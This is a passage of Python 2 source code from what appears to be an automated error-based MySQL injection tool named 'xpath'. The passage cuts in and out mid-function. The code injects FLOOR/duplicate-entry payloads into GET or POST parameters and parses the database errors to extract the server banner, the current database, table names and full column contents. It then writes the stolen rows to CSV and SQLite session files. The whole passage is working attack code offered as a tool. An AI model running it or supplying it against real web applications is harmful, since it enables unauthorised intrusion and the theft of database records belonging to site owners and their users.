_dbsQuery = _payload.replace('LIMIT%200','LIMIT%%20%d' % (itr))
else:
_dbsQuery = _payload.replace('LIMIT+0','LIMIT+%d' % (itr))
try:
req = compat_request(self._url, data=_dbsQuery, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
except KeyboardInterrupt as e:
_clean = ','.join(map(str, _dlist))
return _clean, _payload, _dlist, _dumped
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
_dbn = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (_dbn)
_dlist.append(_dbn)
_clean = ','.join(map(str, _dlist))
return _clean, _payload, _dlist, _dumped
def XpathDataDump(self, init, total, _payload, Table=None, Dbname=None, Coltodump=None, flag=True):
# list for saving dumps
_info = ""
_innerCounter = 0
_colTabulate = [w.replace("`","") for w in Coltodump]
_tabulate = compat_prettytable(_colTabulate)
_tabulate.align = "l"
_tabulate.header = True
cols = " TEXT,".join(map(str, Coltodump))
ColsToCreate = "%s TEXT" % (cols)
ok = re.compile(r'[^\\/:*?"<>|("")$#!%]')
_db = Dbname
if compat_exist(self._tgt):
_directory = "%s" % (_db)
_db_directory = "%s/%s" % (self._tgt, _directory) if os.name is "posix" else "%s\\%s" % (self._tgt, _directory)
self._dbdirectory = "%s" % (_db_directory)
try:
os.makedirs(_db_directory)
except Exception as e:
pass
if compat_exist(self._dbdirectory):
_tbl_dump = "%s/%s" % (self._dbdirectory, Table.replace("`","")) if os.name is "posix" else "%s\\%s" % (self._dbdirectory, Table.replace("`",""))
try:
_csv_file = open("%s.csv" % (_tbl_dump), "ab")
except (Exception, IOError) as e:
if "Permission denied" in e:
print '\n' + compat_color.fr + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [ERROR] Cannot write to '%s.csv' the file is already open please close it.." % (Table)
print compat_color.fw + compat_color.sn + "\n[*] shutting down at "+compat_strftime("%H:%M:%S")+"\n"
exit(0)
else:
_writer = compat_writer(_csv_file, dialect='excel')
if Table and flag:
sqlite.SessionCreate(self._PathSession, Table, Cols=ColsToCreate)
if self._url and not self._data:
# Itering through the no of data
for itr in range(init, total):
for col in Coltodump:
# setting payload
if 'LIMIT/**_**/0' in _payload:
_dbsQuery = _payload.replace('LIMIT/**_**/0','LIMIT/**_**/%d' % (itr))
elif 'LIMIT%200' in _payload:
_dbsQuery = _payload.replace('LIMIT%200','LIMIT%%20%d' % (itr))
else:
_dbsQuery = _payload.replace('LIMIT+0','LIMIT+%d' % (itr))
FinalCountQuery_replaced = _dbsQuery.replace("0x72306f74", "%s" % (col))
try:
req = compat_request(FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
_csv_file.close()
_dlist = str(_tabulate)
return _dlist, _payload
except KeyboardInterrupt as e:
_csv_file.close()
_dlist = str(_tabulate)
return _dlist, _payload
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
_dbn = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (_dbn)
_innerCounter += 1
if _dbn is not None:
_info += "%s," % (_dbn.strip().replace(",", "-") if "," in _dbn else _dbn)
if _innerCounter == len(Coltodump):
try:
_toSplit = "".join(x if ok.match(x) else "_" for x in _info)
_dumped = _toSplit[:-1].split(",")
_writer.writerow(_dumped)
_info = ""
_dt = ",".join(map(str, _dumped))
_data = '"%s"' % (_dt.replace(",", '","'))
sqlite.SessionInsert(self._PathSession, Table, Cols=(ColsToCreate).replace(" TEXT", ""), Data=_data)
_tabulate.add_row(_dumped)
_innerCounter = 0
except KeyboardInterrupt as e:
_csv_file.close()
_dlist = str(_tabulate)
return _dlist, _payload
_dlist = str(_tabulate)
_csv_file.close()
return _dlist, _payload
elif self._url and self._data:
# Itering through the no of data
for itr in range(init, total):
for col in Coltodump:
# setting payload
if 'LIMIT/**_**/0' in _payload:
_dbsQuery = _payload.replace('LIMIT/**_**/0','LIMIT/**_**/%d' % (itr))
elif 'LIMIT%200' in _payload:
_dbsQuery = _payload.replace('LIMIT%200','LIMIT%%20%d' % (itr))
else:
_dbsQuery = _payload.replace('LIMIT+0','LIMIT+%d' % (itr))
FinalCountQuery_replaced = _dbsQuery.replace("0x72306f74", "%s" % (col))
try:
req = compat_request(self._url, data=FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
_dlist = str(_tabulate)
return _dlist, _payload
except KeyboardInterrupt as e:
_dlist = str(_tabulate)
_csv_file.close()
return _dlist, _payload
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
_dbn = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (_dbn)
_innerCounter += 1
if _dbn is not None:
_info += "%s," % (_dbn.strip().replace(",", "-") if "," in _dbn else _dbn)
if _innerCounter == len(Coltodump):
try:
_toSplit = "".join(x if ok.match(x) else "_" for x in _info)
_dumped = _toSplit[:-1].split(",")
_writer.writerow(_dumped)
_info = ""
_dt = ",".join(map(str, _dumped))
_data = '"%s"' % (_dt.replace(",", '","'))
sqlite.SessionInsert(self._PathSession, Table, Cols=(ColsToCreate).replace(" TEXT", ""), Data=_data)
_tabulate.add_row(_dumped)
_innerCounter = 0
except KeyboardInterrupt as e:
_dlist = str(_tabulate)
_csv_file.close()
return _dlist, _payload
_dlist = str(_tabulate)
_csv_file.close()
return _dlist, _payload
def XpathAdvance(self, flag ,tgt, Col, Name=None, Payloads=None, total=None, Dbname=None, TblName=None, ColsList=None):
_tablePayload = self.tblPayload
_colUpdate = Col[0]
_tableSession = self.tblSession
_colAlterCount = Col[1]
_colAlterName = Col[2]
PayloadCount = Payloads[0]
PayloadDump = Payloads[1]
Query_Test = flag
if Name:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (Name)
if self._url and not self._data:
for QueryIndex, inline_comment in compat_product(PayloadCount, (False, True)):
if not Query_Test:
QueryToTest = ('%s' % QueryIndex).replace(" " if inline_comment else "/**/","/**/")
if '0x72306f74' in tgt:
if Dbname and not TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict")))
elif Dbname and TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict"), TblName.encode("hex", "strict")))
elif Dbname and TblName and ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname, TblName))
else:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
req = compat_request(FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
Query_Test = True
Count = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
if not self._session and int(Count) != 0:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlterCount)
print compat_color.fg + compat_color.sd + "[" + compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (Count)
else:
print compat_color.fr + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (Count)
print compat_color.fw + compat_color.sn + "\n[*] shutting down at "+compat_strftime("%H:%M:%S")+"\n"
exit(0)
_data = "'%s'" % (Count)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlterCount).replace(" TEXT",""), Data=_data)
if Query_Test:
DQuery = False
for QueryIndex, inline_comment in compat_product(PayloadDump, (False, True)):
if not DQuery:
QueryToTest = ('%s' % QueryIndex).replace(" " if inline_comment else "/**/","/**/")
if '0x72306f74' in tgt:
if Dbname and not TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict")))
elif Dbname and TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict"), TblName.encode("hex", "strict")))
elif Dbname and TblName and ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (ColsList[0], Dbname, TblName))
else:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
req = compat_request(FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
dbsName = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
DQuery = True
if not self._session:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlterName)
if DQuery:
_init = 0
_total = int(Count) if not flag else int(total)
_payload = FinalCountQuery_replaced
if ColsList:
_pl = _payload.replace(ColsList[0], "0x72306f74")
__dlist, __ = self.XpathDataDump(_init, _total, _pl, Table=TblName, Dbname=Dbname,Coltodump=ColsList)
_dlist = "%s" % (__dlist)
_datapayload = '"%s"' % (_pl)
sqlite.SessionUpdate(self._PathSession, _tablePayload, Col=(_colUpdate).replace(" TEXT",""), Data=_datapayload)
return _dlist
else:
__names, _pl, __dlist, __dumped = self.XpathDump(_init, _total, _payload)
_data = '"%s"' % (__names)
_datapayload = '"%s"' % (_pl)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlterName).replace(" TEXT",""), Data=_data)
sqlite.SessionUpdate(self._PathSession, _tablePayload, Col=(_colUpdate).replace(" TEXT",""), Data=_datapayload)
return __dlist, __dumped
break
elif self._url and self._data:
for QueryIndex, inline_comment in compat_product(PayloadCount, (False, True)):
if not Query_Test:
QueryToTest = ('%s' % QueryIndex).replace(" " if inline_comment else "/**/","/**/")
if '0x72306f74' in tgt:
if Dbname and not TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict")))
elif Dbname and TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict"), TblName.encode("hex", "strict")))
elif Dbname and TblName and ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname, TblName))
else:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
req = compat_request(self._url, data=FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
Query_Test = True
Count = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
if not self._session and int(Count) != 0:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlterCount)
print compat_color.fg + compat_color.sd + "[" + compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (Count)
else:
print compat_color.fr + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (Count)
print compat_color.fw + compat_color.sn + "\n[*] shutting down at "+compat_strftime("%H:%M:%S")+"\n"
exit(0)
_data = "'%s'" % (Count)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlterCount).replace(" TEXT",""), Data=_data)
if Query_Test:
DQuery = False
for QueryIndex, inline_comment in compat_product(PayloadDump, (False, True)):
if not DQuery:
QueryToTest = ('%s' % QueryIndex).replace(" " if inline_comment else "/**/","/**/")
if '0x72306f74' in tgt:
if Dbname and not TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict")))
elif Dbname and TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict"), TblName.encode("hex", "strict")))
elif Dbname and TblName and ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (ColsList[0], Dbname, TblName))
else:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
req = compat_request(self._url, data=FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
dbsName = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
DQuery = True
if not self._session:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlterName)
if DQuery:
_init = 0
_total = int(Count) if not flag else int(total)
_payload = FinalCountQuery_replaced
if ColsList:
_pl = _payload.replace(ColsList[0], "0x72306f74")
__dlist, __ = self.XpathDataDump(_init, _total, _pl, Table=TblName, Dbname=Dbname,Coltodump=ColsList)
_dlist = "%s" % (__dlist)
_datapayload = '"%s"' % (_pl)
sqlite.SessionUpdate(self._PathSession, _tablePayload, Col=(_colUpdate).replace(" TEXT",""), Data=_datapayload)
return _dlist
else:
__names, _pl, __dlist, __dumped = self.XpathDump(_init, _total, _payload)
_data = '"%s"' % (__names)
_datapayload = '"%s"' % (_pl)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlterName).replace(" TEXT",""), Data=_data)
sqlite.SessionUpdate(self._PathSession, _tablePayload, Col=(_colUpdate).replace(" TEXT",""), Data=_datapayload)
return __dlist, __dumped
break
break
def XpathInject(self, flag, Col, Name=None, Payloads=None, TblName=None, Dbname=None, ColList=None):
# Couter for HTTP Requests
HTTPReqCount = 0
_name = Name
# Table Session
_tableSession = self.tblSession
_colsSession = "%s, %s, %s, %s" % (self.colPrm, self.colTyp, self.colTit, self.colPld)
# Column to alter the Table Session
_colAlter = Col
# Table Payload
_tablePayload = self.tblPayload
_colsPayload = "%s,%s,%s,%s" % (self.colDbp, self.colTbp, self.colClp, self.colDtp)
# Get Data Injection
if self._url and not self._data:
vul = False
for prefix, query, sufix, inline_comment in compat_product(PREFIXES, TESTS, SUFIXES, (False, True)):
try:
if not vul:
temp = ("%s%s%s" % (prefix, query, sufix)).replace(" " if inline_comment else "/**/","/**/")
if '*' in self._url:
first, last = self._url.split('*')
tgt = first + temp + last
else:
tgt = self._url + temp
try:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] testing '" + compat_color.fg + compat_color.sn + TITLE + compat_color.fg + compat_color.sn + "'"
req = compat_request(tgt, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
HTTPReqCount += 1
resp = compat_urlopen(req, timeout=self._timeout)
except compat_urlerr as e:
pass
except compat_httperr as e:
pass
except Exception as e:
pass
except KeyboardInterrupt:
print '\n' + compat_color.fr + compat_color.sn + '['+compat_strftime("%H:%M:%S")+'] [ERROR] user aborted'
print compat_color.fw + compat_color.sn + "\n[*] shutting down at "+compat_strftime("%H:%M:%S")+"\n"
exit(0)
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
vul = True
retVal = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
# Creating Tables
if not self._session:
sqlite.SessionCreate(self._PathSession, _tableSession, Cols=_colsSession)
sqlite.SessionCreate(self._PathSession, _tablePayload, Cols=_colsPayload)
print compat_color.fg + compat_color.sb + 'xpath identified the following injection point(s) with a total of %d HTTP(s) requests:' % HTTPReqCount
self._logs += 'xpath identified the following injection point(s) with a total of %d HTTP(s) requests:\n' % HTTPReqCount
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (GET)'
self._logs += 'Parameter: (GET)\n'
print compat_color.fw + compat_color.sn + '\tType: error-based'
self._logs += '\tType: error-based\n'
print compat_color.fw + compat_color.sn + '\tTitle: %s' % TITLE
self._logs += '\tTitle: %s\n' % TITLE
print compat_color.fw + compat_color.sn + '\tPayload: %s' % tgt
self._logs += '\tPayload: %s\n' % tgt
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Initial Injection data insertion into the Tables
_data = '"GET", "error-based", "%s", "%s"' % (TITLE, tgt)
sqlite.SessionInsert(self._PathSession, _tableSession, Cols=(_colsSession).replace(" TEXT",""), Data=_data)
sqlite.SessionInsert(self._PathSession, _tablePayload, Cols=(_colsPayload).replace(" TEXT",""), Data=_data)
# web app response and web server response headers
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
self._logs += "the back-end DBMS is MySQL\n"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
if vul:
# writing into the target.txt file (target, injection type)
w = "%s (%s)" % (self._url, "GET")
with open(str(self._PathPloads), "w") as fw:
fw.write(str(w))
fw.close()
# flag check for basic or advance extraction
if flag == 'basic':
# extracts basics (version, database, user, host)
self.XpathBasic(tgt, _tableSession, _colAlter, _name, Payloads)
else:
# extracts (dbs, tables, columns, dumps data from columns)
_flag = False
if Dbname and not TblName and not ColList:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname)
elif Dbname and TblName and not ColList:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname, TblName=TblName)
elif Dbname and TblName and ColList:
__dlist = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname, TblName=TblName, ColsList=ColList)
_dlist = "%s" % (__dlist)
return _dlist
else:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads)
return __dlist, __dumped
# print "breaking now"
break
except Exception as e:
if not vul:
continue
else:
break
elif self._url and self._data:
vul = False
for prefix, query, sufix, inline_comment in compat_product(PREFIXES, TESTS, SUFIXES, (False, True)):
try:
if not vul:
temp = ("%s%s%s" % (prefix, query, sufix)).replace(" " if inline_comment else "/**/","/**/")
if '*' in self._data:
first, last = self._data.split('*')
tgt = first + temp + last
else:
tgt = self._data + temp
try:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] testing '" + compat_color.fg + compat_color.sn + TITLE + compat_color.fg + compat_color.sn + "'"
req = compat_request(self._url, data=tgt, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
HTTPReqCount += 1
resp = compat_urlopen(req, timeout=self._timeout)
except compat_urlerr as e:
pass
except compat_httperr as e:
pass
except Exception as e:
pass
except KeyboardInterrupt:
print '\n' + compat_color.fr + compat_color.sn + '['+compat_strftime("%H:%M:%S")+'] [ERROR] user aborted'
print compat_color.fw + compat_color.sn + "\n[*] shutting down at "+compat_strftime("%H:%M:%S")+"\n"
exit(0)
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
vul = True
retVal = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
# Creating Tables
if not self._session:
sqlite.SessionCreate(self._PathSession, _tableSession, Cols=_colsSession)
sqlite.SessionCreate(self._PathSession, _tablePayload, Cols=_colsPayload)
print compat_color.fg + compat_color.sb + 'xpath identified the following injection point(s) with a total of %d HTTP(s) requests:' % HTTPReqCount
self._logs += 'xpath identified the following injection point(s) with a total of %d HTTP(s) requests:\n' % HTTPReqCount
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (POST)'
self._logs += 'Parameter: (POST)\n'
print compat_color.fw + compat_color.sn + '\tType: error-based'
self._logs += '\tType: error-based\n'
print compat_color.fw + compat_color.sn + '\tTitle: %s' % TITLE
self._logs += '\tTitle: %s\n' % TITLE
print compat_color.fw + compat_color.sn + '\tPayload: %s' % tgt
self._logs += '\tPayload: %s\n' % tgt
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Initial Injection data insertion into the Tables
_data = '"POST", "error-based", "%s", "%s"' % (TITLE, tgt)
sqlite.SessionInsert(self._PathSession, _tableSession, Cols=(_colsSession).replace(" TEXT",""), Data=_data)
sqlite.SessionInsert(self._PathSession, _tablePayload, Cols=(_colsPayload).replace(" TEXT",""), Data=_data)
# web app response and web server response headers
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
self._logs += "the back-end DBMS is MySQL\n"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
if vul:
# writing into the target.txt file (target, injection type)
w = "%s (%s)" % (self._url, "POST")
with open(str(self._PathPloads), "w") as fw:
fw.write(str(w))
fw.close()
# flag check for basic or advance extraction
if flag == 'basic':
# extracts basics (version, database, user, host)
self.XpathBasic(tgt, _tableSession, _colAlter, _name, Payloads)
else:
# extracts (dbs, tables, columns, dumps data from columns)
_flag = False
if Dbname and not TblName and not ColList:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname)
elif Dbname and TblName and not ColList:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname, TblName=TblName)
elif Dbname and TblName and ColList:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname, TblName=TblName, ColsList=ColList)
print str(__dlist)
else:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads)
return __dlist, __dumped
break
except Exception as e:
continue
def Banner(self):
# Table Session to check previous session using Version (Banner) Column
_tableSession = self.tblSession
_colVersion = self.colVer
# Name to fetch for output
_name = "banner"
# flag setting
_flag = "basic"
# Setting path to session.sqlite file
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
# Get data injection
try:
# Previous Session check
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except Exception as e:
# if no previous Session then create it
# Payloads = BANNER (Version extracting payloads)
# Name = _name (banner)
# flag = _flag (basic)
try:
self.XpathInject(_flag, _colVersion, _name, BANNER)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
try:
# Table Session 1st row
row = PrevSession[0]
except Exception as e:
pass
else:
# If Exists data in Table Session
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Request for web app and web server response headers
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
try:
# Previous Session Version check
banner = sqlite.SessionPrev(self._PathSession, _tableSession, (_colVersion).replace(" TEXT", ""))[0][0]
except Exception as e:
# If not exist extract it again from target
self.XpathBasic(_payload, _tableSession, _colVersion, _name, BANNER)
else:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (banner)
compat_sleep(0.5)
print compat_color.fw + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
self._logs += "back-end DBMS: MySQL >= 5.1\n"
print compat_color.fw + compat_color.sb + "banner: '%s'" % (banner)
self._logs += "banner: %s\n\n" % (banner)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
# elif self._url and self._data:
# pass
def Database(self):
# Table Session to check previous session using Version (Banner) Column
_tableSession = self.tblSession
_colDatabase = self.colCdb
# Name to fetch for output
_name = "current database"
# flag setting
_flag = "basic"
# Setting path to session.sqlite file
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
# Get data injection
try:
# Previous Session check
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except Exception as e:
# if no previous Session then create it
# Payloads = CURRENTDB (Version extracting payloads)
# Name = _name (banner)
# flag = _flag (basic)
try:
self.XpathInject(_flag, _colDatabase, _name, CURRENTDB)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
try:
# Table Session 1st row
row = PrevSession[0]
except Exception as e:
pass
else:
# If Exists data in Table Session
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Request for web app and web server response headers
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
try:
# Previous Session Database check
database = sqlite.SessionPrev(self._PathSession, _tableSession, (_colDatabase).replace(" TEXT", ""))[0][0]
except Exception as e:
# If not exist extract it again from target
self.XpathBasic(_payload, _tableSession, _colDatabase, _name, CURRENTDB)
else:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (database)
compat_sleep(0.5)
print compat_color.fw + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
self._logs += "back-end DBMS: MySQL >= 5.1\n"
print compat_color.fw + compat_color.sb + "current database: '%s'" % (database)
self._logs += "current database: %s\n\n" % (database)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
